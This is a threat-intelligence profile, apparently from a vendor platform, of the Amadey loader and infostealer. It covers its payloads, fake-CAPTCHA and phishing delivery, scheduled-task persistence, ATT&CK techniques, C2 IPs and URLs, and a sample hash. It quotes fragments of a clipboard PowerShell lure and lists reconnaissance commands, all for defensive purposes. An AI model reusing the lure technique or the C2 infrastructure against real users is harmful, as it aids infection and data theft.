Amadey
Amadey is a malware family first identified in 2018 that is widely described as a versatile loader/downloader and infostealer, and is also referred to as a bot associated with a botnet of the same name. Its primary observed functions include collecting system information and reconnaissance data, stealing victim data, and downloading or installing additional payloads. Reported capabilities include collecting the username from an infected host via GetUserNameA, sending victim data to command-and-control servers, using modules or plug-ins for credential theft from popular browsers and VNC systems, screenshot capture, and clipboard hijacking of cryptocurrency wallet addresses. Amadey has also been described as using DLL plug-ins to extend functionality, including screenshot and credential-harvesting modules.
Amadey is frequently used as a delivery mechanism in multi-stage malware operations and malware-as-a-service/pay-per-install ecosystems. Public reporting cited in the content states it has delivered or been associated with payloads including Lumma Stealer, RedLine, StealC, SmokeLoader, AsyncRAT, XWorm, DOILoader/IDAT Loader/HijackLoader, zgRAT, NetSupport, JaskaGO, Arechclient2, Remcos, and in referenced reporting LockBit 3.0. Cisco Talos reported in April 2025 on a MaaS operation using Amadey to deliver payloads via fake GitHub accounts and public repositories, and assessed the infrastructure was likely providing delivery services for multiple customers. Trend Micro also described Amadey as a pay-per-install service widely used to deliver infostealer payloads.
Observed distribution vectors in the content include phishing, cracked software and warez, malicious JavaScript and PowerShell chains, fake CAPTCHA or browser-error social engineering, malvertising, compromised websites, LNK-based delivery chains, and other malware downloaders. Specific reporting ties Amadey delivery to ClearFake campaigns, fake CAPTCHA/browser error lures targeting Windows users, cracked software infection chains, and GitHub-hosted Emmenhtal/PEAKLIGHT-style loaders. Kaspersky reported widespread phishing campaigns in 2024 that used browser-executed scripts mimicking CAPTCHA prompts and browser errors to trigger downloads of either Lumma Stealer or the Amadey Trojan, including exposure on adult sites, file-sharing services, betting platforms, anime resources, and traffic-monetized web apps.
The malware has been observed creating persistence. In one analyzed infection chain, an Amadey payload created a scheduled task to run every minute and modified the user shell folders registry path related to Startup persistence. The content also notes geofencing behavior: Amadey does not run tasks or install additional malware if the victim machine is based in Russia.
Targeting in the provided reporting is broad and opportunistic, but the content specifically mentions use against healthcare organizations, industrial control system environments via phishing-driven initial access, and overlap with campaigns targeting Ukrainian entities. Microsoft Threat Intelligence also referenced Amadey in reporting on Secret Blizzard activity against Ukraine. Known indicators directly mentioned in the content include a previously linked Amadey C2 IP/URL set: 5.42.65.114 was noted as previously associated with an Amadey C2 server; Talos reported Amadey downloaded from 185.215.113.16 as amnew.exe and contacted hxxp://185.215.113.43/Zu7JuNko/index.php; another analyzed sample included the PDB path D:\Mktmp\Amadey\Release\Amadey.pdb and SHA-256 18A38FA6F5B306243D99621556AF948A61DAED29619AB755E25010F9E254C6BD.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
4 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
2024-12-11 ⋅ Microsoft Threat Intelligence Frequent freeloader part II: Russian actor Secret Blizzard using tools of other groups to attack Ukraine Amadey Kazuar Wipbot FlyingYeti
Fuery is a garble-obfuscated Go 1.20.1 implant dropped by the Amadey botnet (campaign fbf543) ... The same Amadey campaign also deploys a VOLK CryptoMiner.
the group had deployed publicly available malware including gh0st RAT, QUASARRAT, and AMADEY
References https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Techniques & procedures
26 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniques
Initial Access
A significant increase in the percentage of malicious scripts and phishing pages was driven by a recent series of widespread phishing attacks in August and September. The phishing lures were distributed through various channels, including phishing emails (e.g., fake vulnerability notifications claiming to be from GitHub), malicious links, and malvertising networks.
Execution
7 techniques
Execution
Process 4192 runs a command that will start a scheduled task called “GoogleUpdateTaskMachineQC” using schtasks ... (T1053.005 – Scheduled Task/Job: Scheduled Task).
Threat actors are increasingly using PowerShell to execute malware, including crypto miners, by embedding malicious code directly into command line arguments.
The instructions provided by the phishing scripts tricked users into executing malicious PowerShell commands to download additional spyware... Nowadays, threat actors are increasingly using PowerShell to execute malware, including crypto miners, by embedding malicious code directly into command line arguments.
Talos discovered another unique file on the “Milidmdds” GitHub account during this research — a malicious Python script named “checkbalance.py”.
Clicking the “I’m not a robot” button copies the line powershell.exe -eC ... to the clipboard and displays so-called “verification steps”: Press Win + R; Press CTRL + V; Press Enter.
Persistence
3 techniques
Persistence
Process 4192 runs a command that will start a scheduled task called “GoogleUpdateTaskMachineQC” using schtasks ... (T1053.005 – Scheduled Task/Job: Scheduled Task).
Privilege Escalation
2 techniques
Privilege Escalation
Stealth
4 techniques
Stealth
The line from the clipboard contains a Base64-encoded PowerShell command... Inside this content is an obfuscated PowerShell script...
Defense Impairment
1 technique
Defense Impairment
Credential Access
1 technique
Credential Access
Discovery
5 techniques
Discovery
The content repeatedly describes malware and threat actors using commands and APIs such as ipconfig /all, ifconfig, arp -a, route print, nbtstat, netsh, GetAdaptersInfo, and GetIpNetTable to gather IP addresses, MAC addresses, DNS, DHCP, gateways, routing tables, ARP cache, proxy settings, domains, and network adapter/interface details.
The content repeatedly describes malware and threat actors collecting usernames, identifying logged-in users, running whoami/query user/quser, checking whether the current user is an administrator, enumerating user sessions, and gathering account details from compromised hosts.
Amadey’s primary functions are to collect system information and download secondary payloads on an infected host.
The content repeatedly describes malware and threat actors listing files and directories, enumerating drives, searching for files by extension/name/path, retrieving file metadata, and browsing file systems (for example: "APT28 has used Forfiles to locate PDF, Excel, and Word documents during collection" and "cmd can be used to find files and directories with native functionality such as dir commands").
Collection
2 techniques
Collection
Command and Control
3 techniques
Command and Control
After execution, this payload contacts “hxxp://185[.]215[.]113[.]43/Zu7JuNko/index.php”, a known Amadey C2 address.
Exfiltration
1 technique
Exfiltration
ADVSTORESHELL exfiltrates data over the same channel used for C2... Agrius exfiltrated staged data using tools such as Putty and WinSCP, communicating with command and control servers... numerous malware and groups sent victim data, files, credentials, or host information over existing C2 channels.
IOCs tracked for this family
739 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
104 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Malware referenced as part of Secret Blizzard operations against Ukraine.
Commodity malware operating as a botnet/loader. In this case it used a C2 panel with a randomized directory path and included a credential-stealing plugin, cred64.dll, targeting browsers, email clients, FTP/SFTP clients, chat software, and Monero wallets.
The content references generated datasets for Windows Amadey file indicators in an attack simulation environment.
A loader used to distribute Socks5Systemz as a standalone final payload.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.